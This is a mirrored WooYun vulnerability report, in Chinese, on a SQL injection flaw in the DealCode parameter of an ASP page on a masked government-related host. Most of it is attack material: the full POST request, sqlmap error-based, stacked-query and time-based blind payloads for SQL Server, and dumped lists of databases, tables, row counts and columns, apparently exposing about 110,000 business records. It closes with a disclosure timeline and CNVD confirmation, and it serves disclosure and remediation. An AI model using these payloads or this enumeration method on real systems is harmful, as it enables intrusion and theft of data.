乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-10: 厂商已经确认,细节仅向厂商公开 2015-12-20: 细节向核心白帽子及相关领域专家公开 2015-12-30: 细节向普通白帽子公开 2016-01-09: 细节向实习白帽子公开 2016-01-23: 细节向公众公开
RT
漏洞地址:
POST /dm/printview_X.asp HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 35Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/dm/deal_X.aspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASPSESSIONIDCSTAQCCT=KCEKKDABHPDIFKJIPOABOJAEDealCode=121213*&Submit=%CC%E1%BD%BB
DealCode参数存在多种注入
---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: DealCode=121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zhKC&Submit=%CC%E1%BD%BB Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: DealCode=121213';WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: DealCode=121213' WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB---[22:13:54] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000
Database: tempdb+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.sysconstraints | 4 || dbo.syssegments | 3 |+--------------------------------------+---------+Database: webcodecheck+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.t_jgdm_cysh | 307878 || dbo.SM_USERLOGIN_LOG | 4342 || dbo.tjlog_save | 3171 || dbo.t_njjhy | 1199 || dbo.t_pzjg | 1052 || dbo.t_jjhy | 1047 || dbo.t_gj | 474 || dbo.t_xzqh | 236 || dbo.SM_SYSOPER_LOG | 120 || dbo.t_bzjgdm | 109 || dbo.t_wtlx | 107 || dbo.SM_USERRIGHTKEY | 88 || dbo.t_hb | 72 || dbo.t_njjlx | 34 || dbo.t_jjlx | 30 || dbo.SM_CONFIG | 29 || dbo.t_njglx | 26 || dbo.SM_RIGHTKEY | 18 || dbo.t_jglx | 12 || dbo.SM_UGROLEDETAIL | 9 || dbo.sysconstraints | 7 || dbo.SM_BRANCH | 5 || dbo.SM_ROLE | 5 || dbo.SM_USERGROUP | 5 || dbo.SM_USERMANAGE | 5 || dbo.syssegments | 3 || dbo.SM_USER | 1 || dbo.v_rand | 1 |+--------------------------------------+---------+Database: CodeNianJian+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.Deal | 1343392 || dbo.t_jgdm | 405154 || dbo.t_jgdm_tm | 298583 || dbo.t_jgdm_xb | 157809 || dbo.t_jgdm_ws3 | 9881 || codenianjian.t_jgdm_backws | 4663 || dbo.t_xzqh1 | 3259 || dbo.t_njjhy | 1199 || dbo.t_jjhy | 1047 || dbo.t_pzjg | 978 || dbo.t_xzqh | 117 || dbo.t_hb | 36 || dbo.t_njjlx | 34 || dbo.t_jjlx | 30 || dbo.sysconstraints | 22 || dbo.t_zjlx | 13 || dbo.t_jglx | 12 || dbo.syssegments | 3 || dbo.ManageUser | 2 |+--------------------------------------+---------+Database: msdb+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.backupfile | 66516 || dbo.backupset | 34961 || dbo.backupmediafamily | 34896 || dbo.backupmediaset | 34895 || dbo.restorefile | 97 || dbo.sysconstraints | 93 || dbo.restorehistory | 78 || dbo.restorefilegroup | 19 || dbo.syscategories | 19 || dbo.syssegments | 3 |+--------------------------------------+---------+Database: codechk+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.CodeOper | 154108 || dbo.Sys_EntryLog | 58650 || dbo.VIEW1 | 2888 || dbo.t_njjhy | 1199 || dbo.Sys_UserRole | 162 || dbo.Sys_user | 112 || dbo.Sys_RoleRight | 89 || dbo.t_hb | 36 || dbo.Sys_Module | 28 || dbo.sysconstraints | 13 || dbo.Sys_Role | 6 || dbo.syssegments | 3 || dbo.Sys_Dept | 1 || dbo.Sys_Unit | 1 |+--------------------------------------+---------+Database: master+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| INFORMATION_SCHEMA.PARAMETERS | 2299 || dbo.spt_values | 730 || INFORMATION_SCHEMA.ROUTINES | 654 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 || INFORMATION_SCHEMA.COLUMNS | 379 || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295 || INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 62 || dbo.spt_datatype_info | 36 || INFORMATION_SCHEMA.TABLES | 34 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 33 || dbo.spt_server_info | 29 || dbo.spt_provider_types | 25 || INFORMATION_SCHEMA.VIEWS | 25 || INFORMATION_SCHEMA.SCHEMATA | 24 || INFORMATION_SCHEMA.ROUTINE_COLUMNS | 17 || dbo.spt_datatype_info_ext | 10 || dbo.syssegments | 3 || dbo.spt_monitor | 1 || dbo.sysconstraints | 1 |+--------------------------------------+---------+Database: webcode+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.t_czjl_bak | 4282282 || dbo.t_czjl | 4245720 || dbo.t_lsls | 3529448 || dbo.t_zysh | 2325489 || dbo.t_zs | 1890425 || dbo.t_bgk_ls | 1842586 || dbo.t_hz_week | 1549480 || dbo.t_zsbhb | 1389852 || dbo.t_hz_day | 590643 || dbo.v_codecheckview | 365669 || dbo.t_hz_month | 363560 || dbo.t_cdsj | 362946 || dbo.tk_fzk | 345475 || dbo.tk_kxxk | 343016 || dbo.t_jgdm_bak | 337073 || dbo.t_jgdm_ls | 336992 || dbo.v_fkbz | 334165 || dbo.t_jgdm | 332534 || dbo.v_jgdm_all | 332534 || dbo.t_fzdm | 242270 || dbo.v_zhika | 191656 || dbo.v_writecard | 191390 || dbo.v_jgdm | 138733 || dbo.v_card | 117891 || dbo.t_sp | 110291 || dbo.t_black | 108832 || dbo.t_hteventlog | 89703 || dbo.tk_fkk | 75604 || dbo.tk_xgk | 73007 || dbo.t_email | 45976 || dbo.t_downloadlog | 10886 || dbo.t_qzjgdm | 8024 || dbo.txzqhmodule | 7749 || dbo.t_qtmdsource | 5453 || dbo.t_xzqh1 | 4195 || dbo.t_printset | 3311 || dbo.t_zsbhsource | 2634 || dbo.t_jglx_pzjg | 2534 || dbo.t_xzqh_bsx | 2430 || dbo.t_mdk | 2035 || dbo.t_zycp | 1462 || dbo.codebuf | 1412 || dbo.t_zsds | 1386 || dbo.v_jgdm_new | 1303 || dbo.t_njjhy | 1199 || dbo.t_jjhy | 1047 || dbo.t_pzjg | 1027 || dbo.trolemodule | 664 || dbo.c_s0101 | 652 || dbo.tuserinfo | 452 || dbo.tusermodule | 394 || dbo.tmodule | 306 || dbo.t_zssl | 294 || dbo.t_gj | 237 || dbo.sysconstraints | 215 || dbo.t_jgdm_save | 210 || dbo.t_mdsource | 140 || dbo.t_djgdm | 134 || dbo.c_s03 | 122 || dbo.t_xzqh | 119 || dbo.t_mdktemp | 116 || dbo.c_s01 | 115 || dbo.s_serial | 104 || dbo.t_zrxzqh | 98 || dbo.t_zszjze | 85 || dbo.v_bzjg | 84 || dbo.V_XZQH | 84 || dbo.ttable | 57 || dbo.trole | 44 || dbo.t_gscssz | 40 || dbo.t_operate_type | 40 || dbo.t_hb | 36 || dbo.t_njjlx | 34 || dbo.t_ljdm | 32 || dbo.tk_printset | 31 || dbo.t_jjlx | 30 || dbo.t_qtmdk | 26 || dbo.pbcatedt | 21 || dbo.pbcatfmt | 20 || dbo.tcss | 20 || dbo.t_jgdmpgsz | 16 || dbo.c_s02 | 15 || dbo.t_zjlx | 13 || dbo.t_cxkey | 12 || dbo.t_jglx | 12 || dbo.t_sclasttime | 9 || dbo.t_jglx_bsx | 8 || dbo.t_cflx | 7 || dbo.t_sppz | 6 || dbo.t_spdmtemp | 5 || dbo.syssegments | 3 || dbo.treport | 3 || dbo.t_gg | 2 || dbo.t_bajlb | 1 || dbo.t_htxtsz | 1 || dbo.t_lyb | 1 || dbo.t_pglasttime | 1 || dbo.t_system | 1 || dbo.t_zgjg | 1 || dbo.t_zsdj | 1 || dbo.tsysinfo | 1 |+--------------------------------------+---------+Database: thams+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| thams.P_FILE0 | 6653069 || thams.RECIVELOG | 1825664 || thams.E_FILE0 | 1728617 || thams.D_FILE0 | 1728208 || thams.TRANSFILELOG | 1318174 || thams.S_LOGIN | 594890 || dbo.VIEW3 | 525769 || dbo.text | 12874 || dbo.tst | 10486 || dbo.t_xwqy_04 | 9110 || dbo.t_gjzx_04 | 7488 || dbo.VIEW2 | 4781 || dbo.t_xwqy_01 | 3511 || dbo.t_jgdm20140811 | 1196 || thams.FLAGLOG | 258 || dbo.sysconstraints | 137 || thams.FTPUSER | 99 || thams.S_ALL | 65 || dbo.VIEW602 | 56 || dbo.xinjiang | 56 || thams.F_D_FILE0 | 50 || thams.F_X_D_FILE0 | 49 || thams.F_W_QT2 | 44 || thams.F_W_QT1 | 40 || thams.F_S_BORROW | 24 || thams.F_S_TMPRIGHT | 24 || thams.F_E_FILE0 | 22 || thams.F_E_FILEQT1 | 22 || thams.F_E_FILEQT2 | 22 || thams.F_S_DESTORY | 19 || thams.F_S_USER | 18 || thams.F_S_DALX | 16 || thams.F_S_REPORT | 16 || thams.F_S_LOG | 13 || thams.S_XTGN | 13 || thams.F_S_HSZ | 12 || thams.F_FLAGLOG | 11 || thams.F_S_FWQPZ | 11 || thams.F_S_MLS | 10 || thams.F_S_GL | 9 || thams.F_S_GZOPER | 9 || thams.F_S_DAOPER | 8 || thams.F_S_LOGIN | 8 || thams.F_Z_ZHKGL | 8 || thams.F_FTPUSER | 7 || thams.F_RECIVELOG | 7 || thams.F_S_DAWJKZDDY | 7 || thams.F_S_MROPER | 7 || thams.F_S_XHLC | 7 || thams.F_S_GROUP | 6 || thams.F_S_ROLERIGHT | 6 || thams.F_S_TBLCODE | 6 || thams.F_S_ZDDYFZB | 6 || thams.F_TRANSFILELOG | 6 || thams.F_Z_WSDGL | 6 || thams.F_D_CLASSIFY0 | 5 || thams.F_D_DHGZ0 | 5 || thams.F_S_MLNODE | 5 || thams.F_S_QZH | 5 || thams.F_S_XTGN | 5 || thams.F_S_XTPXZD | 5 || thams.F_S_ZTKML | 5 || thams.F_W_WJKGL | 5 || thams.F_Z_WSDFW | 5 || thams.CODECONV | 4 || thams.F_D_PATHCONFIG0 | 4 || thams.F_D_PXZD0 | 4 || thams.F_P_BGQX | 4 || thams.F_S_LJF | 4 || thams.F_S_NB | 4 || thams.F_S_PATHCONFIG | 4 || thams.F_S_ROLE | 4 || thams.F_S_TB | 4 || thams.F_S_USERROLE | 4 || thams.F_S_VFM | 4 || thams.F_S_WYFBZD | 4 || thams.F_W_PATHCONFIG | 4 || thams.P_MJ | 4 || dbo.syssegments | 3 || thams.F_D_FZZD0 | 3 || thams.F_D_WBX0 | 3 || thams.F_P_MJ | 3 || thams.F_S_NBTREE | 3 || thams.F_S_TJPROJECT | 3 || thams.F_SYSGK | 3 || thams.P_BGQX | 3 || thams.S_USER | 3 || thams.F_P_ZTC | 2 || thams.F_S_SHJZHHDY | 2 || thams.F_S_YUCODE | 2 || thams.S_ROLE | 2 || thams.SYSGK | 2 || thams.W_WJKGL | 2 || thams.ConverTB | 1 || thams.D_WBX0 | 1 || thams.PAGETABLE | 1 || thams.S_DALX | 1 || thams.S_FWQPZ | 1 || thams.S_MLS | 1 || thams.S_QZH | 1 |+--------------------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: DealCode=121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zhKC&Submit=%CC%E1%BD%BB Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: DealCode=121213';WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: DealCode=121213' WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000Database: CodeNianJianTable: Deal[11 columns]+-------------+----------+| Column | Type |+-------------+----------+| ApplyTime | datetime || AuditTime | datetime || DealCode | varchar || DealDoc | varchar || DealStatus | int || Decision | int || ID | int || jgdm | varchar || UserName | varchar || UserSection | varchar || Zt | varchar |+-------------+----------+
包含11W企业信息
随便跑了两个数据作证明:
@@
危害等级:高
漏洞Rank:10
确认时间:2015-12-10 17:58
CNVD确认并复现所述情况,已经转由CNCERT下发给新疆分中心,由其后续协调网站管理单位处置.
暂无